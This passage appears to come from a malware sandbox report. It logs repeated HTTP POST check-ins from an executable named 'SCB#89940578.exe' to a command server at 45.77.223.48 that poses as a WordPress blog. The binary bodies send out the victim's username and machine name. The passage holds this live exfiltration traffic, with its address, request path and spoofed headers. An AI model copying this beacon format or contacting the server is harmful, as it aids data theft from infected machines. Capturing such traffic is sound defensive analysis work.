                                            Apr 26, 2024 04:42:48.772559881 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                            Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                            Apr 26, 2024 04:42:48.772609949 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                            Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                            Apr 26, 2024 04:42:48.772713900 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                            Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo
                                            Apr 26, 2024 04:42:48.772761106 CEST1289INData Raw: 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 2e 68 61 73 2d 73 6d 61 6c 6c 2d 69 63 6f 6e 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 77 70 2d 62 6c
                                            Data Ascii: margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-social-links,.wp-block-social-links.has-normal-icon-size{font-size:24px}.wp-block-social-links.has-large-icon-size{font-size:36px}.wp-block-social-links.has-


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            30192.168.2.44977245.77.223.48807272C:\Users\user\Desktop\SCB#89940578.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 26, 2024 04:42:49.953965902 CEST246OUTPOST /~blog/?ajax=posts.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.77.223.48
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: 3E699C10
                                            Content-Length: 149
                                            Connection: close
                                            Apr 26, 2024 04:42:50.141944885 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                            Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                            Apr 26, 2024 04:42:51.026690960 CEST215INHTTP/1.1 200 OK
                                            Date: Fri, 26 Apr 2024 02:42:50 GMT
                                            Server: Apache
                                            Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Apr 26, 2024 04:42:51.026801109 CEST22INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20
                                            Data Ascii: <!DOCTYPE html><html
                                            Apr 26, 2024 04:42:51.026854992 CEST37INData Raw: 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                            Data Ascii: lang="en-US"><head><meta charset="
                                            Apr 26, 2024 04:42:51.026928902 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                            Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                            Apr 26, 2024 04:42:51.035284042 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                            Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                            Apr 26, 2024 04:42:51.036096096 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                            Data Ascii: <title>Natural biz blog</title>
                                            Apr 26, 2024 04:42:51.036200047 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                            Apr 26, 2024 04:42:51.036282063 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                            Apr 26, 2024 04:42:51.036546946 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                            Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                            Apr 26, 2024 04:42:51.036678076 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                            Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            31192.168.2.44977345.77.223.48807272C:\Users\user\Desktop\SCB#89940578.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 26, 2024 04:42:51.405219078 CEST246OUTPOST /~blog/?ajax=posts.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.77.223.48
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: 3E699C10
                                            Content-Length: 149
                                            Connection: close
                                            Apr 26, 2024 04:42:51.593858957 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                            Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                            Apr 26, 2024 04:42:52.499456882 CEST215INHTTP/1.1 200 OK
                                            Date: Fri, 26 Apr 2024 02:42:51 GMT
                                            Server: Apache
                                            Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Apr 26, 2024 04:42:52.499512911 CEST141INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                            Apr 26, 2024 04:42:52.507549047 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                            Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                            Apr 26, 2024 04:42:52.507801056 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                            Data Ascii: <title>Natural biz blog</title>
                                            Apr 26, 2024 04:42:52.508023024 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                            Apr 26, 2024 04:42:52.508090019 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                            Apr 26, 2024 04:42:52.508318901 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                            Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                            Apr 26, 2024 04:42:52.508332014 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                            Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                            Apr 26, 2024 04:42:52.508450031 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                            Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo
                                            Apr 26, 2024 04:42:52.508497000 CEST1289INData Raw: 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 2e 68 61 73 2d 73 6d 61 6c 6c 2d 69 63 6f 6e 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 77 70 2d 62 6c
                                            Data Ascii: margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-social-links,.wp-block-social-links.has-normal-icon-size{font-size:24px}.wp-block-social-links.has-large-icon-size{font-size:36px}.wp-block-social-links.has-


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            32192.168.2.44977445.77.223.48807272C:\Users\user\Desktop\SCB#89940578.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 26, 2024 04:42:52.847994089 CEST246OUTPOST /~blog/?ajax=posts.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.77.223.48
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: 3E699C10
                                            Content-Length: 149
                                            Connection: close
                                            Apr 26, 2024 04:42:53.035687923 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                            Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                            Apr 26, 2024 04:42:53.907716990 CEST215INHTTP/1.1 200 OK
                                            Date: Fri, 26 Apr 2024 02:42:52 GMT
                                            Server: Apache
                                            Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Apr 26, 2024 04:42:53.907912970 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                            Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                            Apr 26, 2024 04:42:53.916510105 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                            Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                            Apr 26, 2024 04:42:53.916714907 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                            Data Ascii: <title>Natural biz blog</title>
                                            Apr 26, 2024 04:42:53.916788101 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                            Apr 26, 2024 04:42:53.916976929 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                            Apr 26, 2024 04:42:53.917152882 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                            Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                            Apr 26, 2024 04:42:53.917218924 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                            Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                            Apr 26, 2024 04:42:53.917546034 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                            Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo
                                            Apr 26, 2024 04:42:54.097213984 CEST1289INData Raw: 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 2e 68 61 73 2d 73 6d 61 6c 6c 2d 69 63 6f 6e 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 77 70 2d 62 6c
                                            Data Ascii: margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-social-links,.wp-block-social-links.has-normal-icon-size{font-size:24px}.wp-block-social-links.has-large-icon-size{font-size:36px}.wp-block-social-links.has-


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            33192.168.2.44977545.77.223.48807272C:\Users\user\Desktop\SCB#89940578.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 26, 2024 04:42:54.249805927 CEST246OUTPOST /~blog/?ajax=posts.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.77.223.48
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: 3E699C10
                                            Content-Length: 149
                                            Connection: close
                                            Apr 26, 2024 04:42:54.436537027 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                            Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                            Apr 26, 2024 04:42:55.362730980 CEST215INHTTP/1.1 200 OK
                                            Date: Fri, 26 Apr 2024 02:42:54 GMT
                                            Server: Apache
                                            Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Apr 26, 2024 04:42:55.363073111 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                            Apr 26, 2024 04:42:55.363189936 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                            Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                            Apr 26, 2024 04:42:55.371556044 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                            Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                            Apr 26, 2024 04:42:55.371814966 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                            Data Ascii: <title>Natural biz blog</title>
                                            Apr 26, 2024 04:42:55.372040033 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                            Apr 26, 2024 04:42:55.372121096 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                            Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                            Apr 26, 2024 04:42:55.372193098 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                            Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                            Apr 26, 2024 04:42:55.372267008 CEST761INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                            Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo
                                            Apr 26, 2024 04:42:55.550056934 CEST1289INData Raw: 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f
                                            Data Ascii: <style id='wp-block-social-links-inline-css'>.wp-block-social-links{background:none;box-sizing:border-box;margin-left:0;padding-left:0;padding-right:0;text-indent:0}.wp-block-social-links .wp-social-link a,.wp-block-social-links .wp-social-li


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            34192.168.2.44977745.77.223.48807272C:\Users\user\Desktop\SCB#89940578.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 26, 2024 04:42:55.707370996 CEST246OUTPOST /~blog/?ajax=posts.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.77.223.48
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: 3E699C10
                                            Content-Length: 149
                                            Connection: close
                                            Apr 26, 2024 04:42:55.899482012 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                            Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                            Apr 26, 2024 04:42:56.796880960 CEST215INHTTP/1.1 200 OK
                                            Date: Fri, 26 Apr 2024 02:42:55 GMT
